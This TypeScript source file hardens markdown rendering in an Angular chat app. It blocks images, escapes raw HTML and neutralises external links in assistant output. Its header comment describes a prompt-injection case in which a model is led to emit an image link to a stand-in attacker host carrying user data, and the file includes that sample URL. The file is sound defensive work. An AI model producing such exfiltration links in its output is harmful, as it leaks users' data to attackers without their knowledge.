import { Marked, type MarkedExtension, type Tokens } from 'marked';

/**
 * Renderer overrides that stop assistant-authored markdown from reaching the network.
 *
 * Why this exists: assistant text is rendered with `marked.parse()` into `[innerHTML]`. Angular's
 * sanitizer strips `<script>` and `on*` handlers, but it KEEPS `<img src>` and `<a href>`, and the
 * app sets no CSP. So a prompt injection that makes the model emit
 * `![](https://attacker.tld/?d=<data>)` becomes a zero-click GET the moment the text renders — and
 * the chat renders while tokens are still streaming, so it fires mid-response.
 *
 * The server cannot fix this: it does not know the rendering context. The three sinks:
 *  - `image` — auto-loaded, so it is dropped entirely (alt text kept).
 *  - `html`  — raw HTML is escaped, which also catches an inline `<img>` that would otherwise slip
 *              past `marked`'s image token and be reassembled by the browser.
 *  - `link`  — one click rather than zero, but still an exfiltration channel, so external hrefs are
 *              dropped and the URL is shown as visible text instead (the user can see where it went
 *              rather than being silently deceived).
 */

function escapeHtml(text: string): string {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

/** Relative, same-origin, or an in-page anchor. Anything else is "external". */
function isLocalHref(href: string): boolean {
  const trimmed = (href ?? '').trim();
  if (trimmed === '') return false;
  if (trimmed.startsWith('#') || trimmed.startsWith('/')) return true;
  try {
    // A bare path resolves against the origin; an absolute URL keeps its own.
    return new URL(trimmed, window.location.origin).origin === window.location.origin;
  } catch {
    return false;
  }
}

interface RendererThis {
  parser: { parseInline: (tokens: Tokens.Generic[]) => string };
}

/**
 * Build the restricted renderer. Pass it to `marked.parse(md, extension)`.
 *
 * Not applied globally via `marked.use()` on purpose: `wbi-markdown` also renders first-party legal
 * text, where external links are legitimate. The restriction is per-render so the safe behaviour can
 * be the default while that one caller opts out.
 */
export function createSafeMarkedRenderer(): MarkedExtension {
  return {
    renderer: {
      image({ text, title }: Tokens.Image): string {
        // Never emit <img>; keep whatever the alt text said so the sentence still reads.
        const label = escapeHtml(text || title || 'imagen');
        return `<span class="markdown__blocked-image">${label}</span>`;
      },

      html({ text }: Tokens.HTML | Tokens.Tag): string {
        return escapeHtml(text);
      },

      link(this: RendererThis, { href, tokens, text }: Tokens.Link): string {
        const label = tokens?.length ? this.parser.parseInline(tokens) : escapeHtml(text ?? '');
        if (isLocalHref(href)) {
          return `<a href="${escapeHtml(href)}">${label}</a>`;
        }
        // External: no anchor at all, and the destination is surfaced as inert text.
        return `${label} <span class="markdown__blocked-link">(${escapeHtml(href)})</span>`;
      },
    },
  };
}

/**
 * Isolated `Marked` instance carrying the overrides.
 *
 * They MUST be registered through `use()` (which merges into the default renderer) rather than
 * passed as `parse(md, { renderer })` — that form REPLACES the renderer wholesale, so every method
 * we did not define goes missing and even a plain paragraph throws
 * `this.renderer.paragraph is not a function`.
 *
 * A dedicated instance rather than the global `marked.use()` keeps the opt-out path
 * (`allowExternal`, used by the legal dialog) rendering with stock behaviour.
 */
const safeMarked = new Marked(createSafeMarkedRenderer());

/** Parse markdown with external resources blocked. Synchronous — the result goes straight to innerHTML. */
export function parseMarkdownSafely(markdown: string): string {
  return safeMarked.parse(markdown, { async: false }) as string;
}
